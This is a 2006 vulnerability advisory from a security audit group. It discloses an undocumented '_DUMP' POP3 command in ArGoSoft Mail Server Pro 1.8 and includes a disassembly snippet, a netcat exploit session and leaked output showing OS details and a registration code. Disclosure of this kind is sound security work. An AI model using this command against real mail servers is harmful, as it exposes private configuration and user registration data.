Advisory: NSAG-¹201-24.02.2006 Research: NSA Group [Russian company on Audit of safety & Network security] Site of Research: http://www.nsag.ru or http://www.nsag.org Product: ArGoSoft Mail Server Pro 1.8 POP Site of manufacturer: www.argosoft.com The status: 19/11/2005 - Publication is postponed. 19/11/2005 - Manufacturer is notified. 16/02/2006 - Answer of the manufacturer is absent. 16/02/2006 - Publication of vulnerability. Original Advisory: http://www.nsag.ru/vuln/879.html Risk: Hide Description: Executed a command _DUMP, user gets access to the private information. Influence: Removed user gets access to a configuration of the server, the established system, the registration information and registration records of users. The Site of a code in which the given command has been found: ++++++++++++++++ Disassembler listing +++++++++++++++++++ CODE:0051AF65 D_DUMP: ; CODE XREF: D_POP3+F10j CODE:0051AF65 lea edx, [ebp+var_144] CODE:0051AF6B mov eax, [ebp+var_8] CODE:0051AF6E call sub_409DE0 CODE:0051AF73 mov eax, [ebp+var_144] CODE:0051AF79 mov edx, offset a_dump; "_DUMP" CODE:0051AF7E call sub_405908 ++++++++++++++++++++++++++++++++++++++++++++++++ Exploit: M: \> nc.exe 192.168.1.1 110 +OK ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.8.1) _DUMP The Cut down result of performance: +OK Information Follows OS = Microsoft Windows 2000 Professional Service Pack 4 (Build 2195) RegUserName = UserTester RegCode = 917RCG790087CY4E More information: http://www.nsag.ru/vuln/879.html ------------------------------------------------------------------------------------ Our company is the independent auditor of the software in market IT. At present independent audit of the software becomes the standard practice and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors! www.nsag.ru «Nemesis» © 2006 ------------------------------------ Nemesis Security Audit Group © 2006.